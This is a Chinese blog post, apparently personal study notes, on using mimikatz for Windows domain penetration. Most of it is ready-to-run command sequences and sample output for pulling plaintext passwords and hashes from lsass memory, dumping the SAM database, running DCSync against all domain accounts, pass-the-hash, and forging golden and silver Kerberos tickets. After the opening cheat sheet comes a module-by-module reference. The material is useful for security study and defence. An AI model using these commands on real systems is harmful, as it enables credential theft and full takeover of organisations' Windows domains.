<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="mimikatz的使用"><meta name="keywords" content="工具"><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>mimikatz的使用 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.0.0'
} </script><meta name="generator" content="Hexo 6.0.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E6%93%8D%E4%BD%9C"><span class="toc-number">1.</span> <span class="toc-text">常用操作</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mimikatz%E7%9A%84%E5%90%84%E4%B8%AA%E6%A8%A1%E5%9D%97"><span class="toc-number">2.</span> <span class="toc-text">mimikatz的各个模块</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E4%BD%BF%E7%94%A8%E6%A8%A1%E5%9D%97"><span class="toc-number">3.</span> <span class="toc-text">常使用模块</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#standard"><span class="toc-number">3.1.</span> <span class="toc-text">standard</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#privilege"><span class="toc-number">3.2.</span> <span class="toc-text">privilege</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sekurlsa"><span class="toc-number">3.3.</span> <span class="toc-text">sekurlsa</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#kerberos"><span class="toc-number">3.4.</span> <span class="toc-text">kerberos</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#lsadump"><span class="toc-number">3.5.</span> <span class="toc-text">lsadump</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#token"><span class="toc-number">3.6.</span> <span class="toc-text">token</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#process"><span class="toc-number">3.7.</span> <span class="toc-text">process</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ts"><span class="toc-number">3.8.</span> <span class="toc-text">ts</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/kakashi-cat.jpg"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">人间值得，未来可期</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Dar1in9s">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">89</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">17</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">17</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://gryffinbit.top">Gryffinbit</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">mimikatz的使用</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-30</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.5k</span><span class="post-meta__separator">|</span><span>阅读时长: 10 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>mimikatz非常出名，在域渗透中也用得很多，这里来系统学习一下。</p>
<span id="more"></span>

<h2 id="常用操作"><a href="#常用操作" class="headerlink" title="常用操作"></a>常用操作</h2><p><strong>从lsass的内存中提取明文密码</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;log&quot; &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>

<p><strong>dump SAM数据库</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">在线，可以使用token::<span class="built_in">whoami</span> 来模拟系统令牌</span></span><br><span class="line">&quot;privilege::debug&quot; &quot;token::elevate&quot; &quot;lsadump::sam&quot; &quot;exit&quot;</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">离线</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">先备份SYSTEM和SAM数据库</span></span><br><span class="line">reg save HKLM\SYSTEM SystemBkup.hiv</span><br><span class="line">reg save HKLM\SAM SamBkup.hiv</span><br><span class="line"></span><br><span class="line">&quot;lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>

<p><strong>查看ntds.dit与sam文件的信息，如果没有查看ntds.dit的就只查看sam</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;privilege::debug&quot; &quot;lsadump::lsa /patch&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>

<p><strong>dcsync同步域控账户数据</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">列出指定用户的密码信息</span></span><br><span class="line">&quot;lsadump::dcsync /domain:hackme.com /user:administrator&quot; &quot;exit&quot;</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">列出所有用户的账户密码</span></span><br><span class="line">&quot;lsadump::dcsync /domain:hackme.com /all /csv&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>

<p><strong>哈希传递</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;sekurlsa::pth /user:Administrateur /domain:hackme.com /ntlm:cc36cf7a8514893efccd332446158b1a&quot;</span><br></pre></td></tr></table></figure>


<p><strong>制作黄金票据并导入</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">需要以下信息：域名、域sid、krbtgt哈希值，伪造的用户</span></span><br><span class="line">whoami /user    # 获取域的sid值(去掉最后的-500，500表示为administrator用户)</span><br><span class="line">net config workstation  # 查看所处域</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">利用mimikatz生成黄金票据，并导入</span></span><br><span class="line">&quot;kerberos::purge&quot; &quot;kerberos::golden /user:Administrator /domain:hackme.com /sid:S-1-5-21-352500431-3709684021-2404362605 /krbtgt:46ff2921e1cbc03aa37acf91b8afe9df /ticket:golden.kirbi&quot; &quot;kerberos::ptt golden.kirbi&quot;</span><br></pre></td></tr></table></figure>

<p><strong>制作白银票据并导入</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">所需条件：域名、域sid、目标服务器名、可利用的服务、服务账号的NTML HASH 、需要伪造的用户名</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">伪造共享文件夹服务（cifs）权限</span></span><br><span class="line">kerberos::golden /domain:hackme.com /sid:S-1-5-21-3819194653-65834573-1010597107 /target:dc.hackme.com /service:cifs /rc4:a678800c3444a2fdb1ef68e2c5b208bf /user:administrator /ptt</span><br><span class="line"><span class="meta"># </span><span class="language-bash">访问共享文件服务</span></span><br><span class="line">dir \\dc\c$</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="language-bash">伪造LDAP服务权限</span></span><br><span class="line">如果已经获取DC机器账户的哈希值，便可以使用银票访问其LDAP服务，执行mimikatz的DCSync，以获取krbtgt用户的hash，进而制作黄金票据</span><br><span class="line"><span class="meta"># </span><span class="language-bash">制作票据并导入</span></span><br><span class="line">kerberos::golden /domain:hackme.com /sid:S-1-5-21-3819194653-65834573-1010597107 /target:dc.hackme.com /service:ldap /rc4:a678800c3444a2fdb1ef68e2c5b208bf /user:administrator /ptt</span><br><span class="line"><span class="meta"># </span><span class="language-bash">执行dcsync</span></span><br><span class="line">lsadump::dcsync /domain:hackme.com /user:krbtgt</span><br></pre></td></tr></table></figure>



<h2 id="mimikatz的各个模块"><a href="#mimikatz的各个模块" class="headerlink" title="mimikatz的各个模块"></a>mimikatz的各个模块</h2><p>mimikatz分为以下模块：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">standard        # mimikatz的主要模块，它包含使用该工具进行操作的快速命令。</span><br><span class="line">    # Commands: exit, cls, answer, coffe, sleep, log, base64, version, cd</span><br><span class="line">    </span><br><span class="line">privilege       # 提供了一些命令来操作 mimikatz 进程的权限</span><br><span class="line">    # Commands: debug</span><br><span class="line">    </span><br><span class="line">crypto          # 加密相关模块</span><br><span class="line">    # Commands: providers, stores, sc, scauth, certificates, keys, capi, cng</span><br><span class="line">    </span><br><span class="line">sekurlsa        # 该模块从lsass的内存中提取密码，密钥，密码，票证</span><br><span class="line">    # Commands: logonpasswords, pth, tickets, ekeys, dpapi, minidump, process, searchpasswords</span><br><span class="line">    #           msv, wdigest, kerberos, tspkg, livessp, ssp, credman</span><br><span class="line">    </span><br><span class="line">kerberos        # kerberos票据相关</span><br><span class="line">    # Commands: ptt, golden / silver, list, tgt, purge</span><br><span class="line">    </span><br><span class="line">lsadump         # 用于与Windows本地安全验证(Windows Local Security Authority, LSA)进程进行交互来提取凭证数据</span><br><span class="line">    # Commands: sam, secrets, cache, lsa, trust, backupkeys, rpdata, dcsync, netsync</span><br><span class="line">    </span><br><span class="line">vault           # Windows证书模块</span><br><span class="line">    # Commands: list, cred</span><br><span class="line"></span><br><span class="line">token           # 令牌操作模块</span><br><span class="line">    # Commands: whoami, list, elevate, revert</span><br><span class="line">    </span><br><span class="line">event           # 事件模块</span><br><span class="line">    # Commands: drop, clear</span><br><span class="line"></span><br><span class="line">ts              # 终端服务器模块</span><br><span class="line">    # Commands: multirdp</span><br><span class="line"></span><br><span class="line">process         # 进程相关模</span><br><span class="line">    # Commands: list, exports, imports, start, stop, suspend, resume</span><br><span class="line">    </span><br><span class="line">service         # 服务相关模块</span><br><span class="line">    # Commands: start, remove, stop, suspend, resume, preshutdown, shutdown, list</span><br><span class="line">    </span><br><span class="line">net             #</span><br><span class="line">    # Commands: user, localgroup, group</span><br><span class="line">    </span><br><span class="line">misc            # 杂项模块</span><br><span class="line">    # Commands: cmd, regedit, taskmgr, ncroutemon, detours, wifi, addsid, memssp, skeleton</span><br></pre></td></tr></table></figure>


<h2 id="常使用模块"><a href="#常使用模块" class="headerlink" title="常使用模块"></a>常使用模块</h2><h3 id="standard"><a href="#standard" class="headerlink" title="standard"></a>standard</h3><p>这是mimikatz的主要模块，它包含使用该工具进行操作的快速命令。对于standard模块，不需要用模块名称作为命令的前缀，例如：<code>exit</code>与<code>standard::exit</code>相同。</p>
<p><code>Commands： exit, cls, answer, coffe, sleep, log, base64, version, cd</code></p>
<p>**<code>log</code>**：将所有输出记录到文件（默认情况下为<code>mimikatz.log</code>）</p>
<p>参数：</p>
<ul>
<li><code>filename</code> - 可选，指定日志文件</li>
<li><code>/stop</code> - 可选，停止日志</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # log</span><br><span class="line">Using &#x27;mimikatz.log&#x27; for logfile : OK</span><br><span class="line"></span><br><span class="line">mimikatz # log other.log</span><br><span class="line">Using &#x27;other.log&#x27; for logfile : OK</span><br><span class="line"></span><br><span class="line">mimikatz # log /stop</span><br><span class="line">Using &#x27;(null)&#x27; for logfile : OK</span><br></pre></td></tr></table></figure>

<p>**<code>base64</code>**：对写入磁盘上的文件，形式切换为Base64</p>
<p>**<code>cd</code>**：更改或显示当前目录</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # cd</span><br><span class="line">C:\security\mimikatz\mimikatz</span><br><span class="line"></span><br><span class="line">mimikatz # cd x:\vm</span><br><span class="line">Old: C:\security\mimikatz\mimikatz</span><br><span class="line">New: x:\vm</span><br></pre></td></tr></table></figure>


<h3 id="privilege"><a href="#privilege" class="headerlink" title="privilege"></a>privilege</h3><p>**<code>debug</code>**：请求 mimikatz 进程的调试权限。调试权限允许用户调试他们原本无法访问的进程。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug</span><br><span class="line">Privilege &#x27;20&#x27; OK</span><br></pre></td></tr></table></figure>

<h3 id="sekurlsa"><a href="#sekurlsa" class="headerlink" title="sekurlsa"></a>sekurlsa</h3><p>该模块从lsass的内存中提取密码，密钥，密码，票证</p>
<p><code>Commands: logonpasswords, pth, tickets, ekeys, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman</code></p>
<p>在使用lsass进程时，mimikatz需要特定的权限：</p>
<ul>
<li>Administrator用户，可以通过<code>privilege::debug</code>获取debug权限</li>
<li>SYSTEM账户，此时可以不需要debug权限</li>
</ul>
<p>**<code>logonpasswords</code>**：获登录用户信息及密码</p>
<p>**<code>pth</code>**：哈希传递<br>mimikatz 可以执行“传递哈希”，使用用户密码的 NTLM 哈希运行进程。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">参数</span></span><br><span class="line">/user    # 要模拟的用户名。</span><br><span class="line">/domain  # 完全限定的域名。没有域，或者对于本地用户/管理员，请使用计算机或服务器名称.</span><br><span class="line">/rc4 or /ntlm     # 可选 - 密码的RC4值/NTLM hash.</span><br><span class="line">/aes128      # 可选，the AES128 key derived from the user&#x27;s password and the realm of the domain.</span><br><span class="line">/aes256      # 可选，the AES256 key derived from the user&#x27;s password and the realm of the domain.</span><br><span class="line">/run         # 可选，要运行的命令行，默认值为：cmd</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a</span><br><span class="line">user    : Administrateur</span><br><span class="line">domain  : chocolate.local</span><br><span class="line">program : cmd.exe</span><br><span class="line">NTLM    : cc36cf7a8514893efccd332446158b1a</span><br><span class="line">  |  PID  712</span><br><span class="line">  |  TID  300</span><br><span class="line">  |  LUID 0 ; 362544 (00000000:00058830)</span><br><span class="line">  \_ msv1_0   - data copy @ 000F8AF4 : OK !</span><br><span class="line">  \_ kerberos - data copy @ 000E23B8</span><br><span class="line">   \_ rc4_hmac_nt       OK</span><br><span class="line">   \_ rc4_hmac_old      OK</span><br><span class="line">   \_ rc4_md4           OK</span><br><span class="line">   \_ des_cbc_md5       -&gt; null</span><br><span class="line">   \_ des_cbc_crc       -&gt; null</span><br><span class="line">   \_ rc4_hmac_nt_exp   OK</span><br><span class="line">   \_ rc4_hmac_old_exp  OK</span><br><span class="line">   \_ *Password replace -&gt; null</span><br></pre></td></tr></table></figure>

<p>注意： 需要提升权限（<code>privilege::debug</code>或SYSTEM帐户）</p>
<p>**<code>tickets</code>**：列出并导出所有会话的 Kerberos 票据。</p>
<blockquote>
<p>与<code>kerberos::list</code>不同，<code>sekurlsa</code>使用内存读取，不受密钥导出限制。<code>sekurlsa</code>可以访问其他会话（用户）的票据。</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">参数</span></span><br><span class="line">/export # 可选，将票据导出到.kirbi文件中，They start with user&#x27;s LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT)</span><br></pre></td></tr></table></figure>

<p>**<code>ekeys</code>**：显示 Kerberos 加密密钥。<br>**<code>dpapi</code>**：显示内存中的 MasterKeys</p>
<p>**<code>minidump</code>**：读取已经dump的内存信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # sekurlsa::minidump lsass.dmp</span><br><span class="line">Switch to MINIDUMP : &#x27;lsass.dmp&#x27;</span><br><span class="line"></span><br><span class="line">mimikatz # sekurlsa::logonpasswords</span><br><span class="line">Opening : &#x27;lsass.dmp&#x27; file for minidump...</span><br><span class="line"></span><br><span class="line">Authentication Id : 0 ; 88038 (00000000:000157e6)</span><br><span class="line">Session           : Interactive from 1</span><br><span class="line">User Name         : Gentil Kiwi</span><br><span class="line">Domain            : vm-w7-ult</span><br><span class="line">SID               : S-1-5-21-2044528444-627255920-3055224092-1000</span><br><span class="line">        msv :</span><br><span class="line">         [00000003] Primary</span><br><span class="line">         * Username : Gentil Kiwi</span><br><span class="line">         * Domain   : vm-w7-ult</span><br><span class="line">         * LM       : d0e9aee149655a6075e4540af1f22d3b</span><br><span class="line">         * NTLM     : cc36cf7a8514893efccd332446158b1a</span><br><span class="line">         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<h3 id="kerberos"><a href="#kerberos" class="headerlink" title="kerberos"></a>kerberos</h3><p>kerberos模块无需任何权限即可使用，它使用官方的Microsoft Kerberos API。</p>
<p><code>Commands: ptt, golden/silver, list, tgt, purge</code></p>
<p>**<code>ptt</code>**：票据传递，在当前会话中注入一个或多个 Kerberos 票据</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">参数</span></span><br><span class="line">filename    # 票据文件名，可以是多个</span><br><span class="line">diretory    # 票据所在文件夹，该文件夹下所有的 .kirbi 文件都会被注入</span><br></pre></td></tr></table></figure>

<p>**<code>golden/silver</code>**：为任何用户&#x2F;用户组创建 Kerberos 票证、TGT 或具有任意数据的 TGS</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">参数</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="language-bash"><span class="comment"># common</span></span></span><br><span class="line">/domain  # 完全限定的域名 (eg: chocolate.local).</span><br><span class="line">/sid     # 域名的SID (eg: S-1-5-21-130452501-2365100805-3685010670).</span><br><span class="line">/user    # 要模拟的用户名.</span><br><span class="line">/id      # 可选，the id of the user，default is: 500 for the well-known Administrator.</span><br><span class="line">/groups  # 可选，id of groups the user belongs (first is primary group, comma separator) - default is: 513,512,520,518,519 for the well-known Administrator&#x27;s groups.</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="language-bash"><span class="comment"># key</span></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">对于黄金票据，需要krbtgt账户的<span class="built_in">hash</span>;</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">对于白银票据, 需要机器账户或者服务账户的票据（<span class="string">&quot;computer account&quot;</span> or <span class="string">&quot;service account&quot;</span>）</span></span><br><span class="line">/rc4 or /krbtgt     # the NTLM hash</span><br><span class="line">/aes128 # the AES128 key</span><br><span class="line">/aes256 #the AES256 key‘</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="language-bash"><span class="comment"># 白银票据的Target &amp; Service</span></span></span><br><span class="line">/target     # the server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433, ...)</span><br><span class="line">/service    # The service name for the ticket (ex: cifs, rpcss, http, mssql, ...)</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="language-bash"><span class="comment"># 生成票据的下一步</span></span></span><br><span class="line">/ticket     # optional - filename for output the ticket - default is: ticket.kirbi.</span><br><span class="line">/ptt        # no output in file, just inject the golden ticket in current session.</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">生成黄金票据</span></span><br><span class="line">kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:utilisateur.chocolate.kirbi</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">生成白银票据并导入</span></span><br><span class="line">kerberos::golden /domain:hackme.com /sid:S-1-5-21-3819194653-65834573-1010597107 /target:dc.hackme.com /service:cifs /rc4:a678800c3444a2fdb1ef68e2c5b208bf /user:administrator /ptt</span><br></pre></td></tr></table></figure>


<p>**<code>tgt</code>**：显示有关当前会话的 TGT 的信息</p>
<p>**<code>list</code>**：列出并导出当前会话的 Kerberos 票据（TGT 和 TGS）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">参数：</span></span><br><span class="line">/export     # 可选，将所有票证导出到文件</span><br></pre></td></tr></table></figure>

<p>**<code>purge</code>**：清除当前会话的所有票证</p>
<h3 id="lsadump"><a href="#lsadump" class="headerlink" title="lsadump"></a>lsadump</h3><p>lsadump 模块用于与 Windows 本地安全验证（Windows Local Security Authority ）(LSA) 进程进行交互来提取凭证数据。这个模块的大多数命令都需要 Debug 权限或者是 SYSTEM 权限。</p>
<p><code>Commands: sam, secrets, cache, lsa, trust, backupkeys, rpdata, dcsync, netsync</code></p>
<p>**<code>sam</code>**：dump SAM数据库，它包含用户密码的 NTLM。</p>
<p>它可以在两种模式下工作：</p>
<ul>
<li>在线，使用SYSTEM用户或令牌</li>
<li>离线，使用系统和SAM配置单元或备份</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">在线，可以使用token::<span class="built_in">whoami</span> 来模拟系统令牌</span></span><br><span class="line">privilege::debug</span><br><span class="line">token::elevate</span><br><span class="line">lsadump::sam</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">离线</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">先备份SYSTEM和SAM数据库</span></span><br><span class="line">reg save HKLM\SYSTEM SystemBkup.hiv</span><br><span class="line">reg save HKLM\SAM SamBkup.hiv</span><br><span class="line"></span><br><span class="line">lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv</span><br></pre></td></tr></table></figure>

<p>**<code>lsa</code>**：通过询问LSA服务器从内存中提取哈希</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">参数：</span></span><br><span class="line">/inject     # 可选，注入 LSASS 进程提取凭证数据</span><br><span class="line">/name       # 可选，目标用户账户的帐户名称</span><br><span class="line">/id         # 可选，目标用户账户的 RID</span><br><span class="line">/patch      # 可选，补丁 LSASS 进程</span><br></pre></td></tr></table></figure>

<p>**<code>dcsync</code>**：向 DC 发起同步一个对象（获取帐户的密码数据）的质询。</p>
